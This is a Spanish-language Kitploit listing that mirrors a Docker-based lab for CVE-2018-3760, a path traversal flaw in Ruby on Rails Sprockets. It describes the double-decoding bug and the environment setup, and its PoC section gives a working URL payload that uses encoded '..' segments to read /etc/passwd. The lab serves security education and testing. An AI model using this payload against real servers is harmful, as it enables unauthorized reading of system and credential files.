Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760- — Laboratorio basado en Docker que demuestra el path traversal CVE-2018-3760 en Ruby on Rails Sprockets, con PoC y configuración del entorno para pruebas de seguridad y educación. | Kitploit
Herramientas/GitHubGitHub/cyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebAprendizaje y EducaciónLabs y Práctica
GitHubcyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-

Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-

Laboratorio basado en Docker que demuestra el path traversal CVE-2018-3760 en Ruby on Rails Sprockets, con PoC y configuración del entorno para pruebas de seguridad y educación.

Ver Repositorio
31hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de Path Traversal en Ruby On Rails(CVE-2018-3760)

中文版本(Versión china)

Ruby On Rails es un conocido framework de desarrollo web en Ruby, que utiliza Sprockets como servidor de archivos estáticos en el entorno de desarrollo. Sprockets es una biblioteca de Ruby que compila y distribuye archivos de recursos estáticos.

Existe una vulnerabilidad de path traversal causada por una decodificación secundaria en Sprockets 3.7.1 y versiones anteriores. Un atacante puede usar %252e%252e/ para acceder al directorio raíz y leer o ejecutar cualquier archivo en el servidor objetivo.

Enlaces de referencia:

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • https://seclists.org/oss-sec/2018/q2/210
  • https://xz.aliyun.com/t/2542

Configuración del entorno

Ejecute el siguiente comando:

root@kitploit:~
docker-compose up -d

Visite http://your-ip:3000 y verá la página de bienvenida.

POC

Se producirá un error al visitar http://your-ip:3000/assets/file:%2f%2f/etc/passwd directamente, ya que el archivo /etc/passwd no está en el directorio permitido.

Podemos obtener una lista de directorios permitidos desde la página de error. Simplemente seleccione uno de ellos, como /usr/src/blog/app/assets/images, luego use %252e%252e/ para saltar al directorio padre, y finalmente lea el archivo /etc/passwd:

root@kitploit:~
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

Descargar herramienta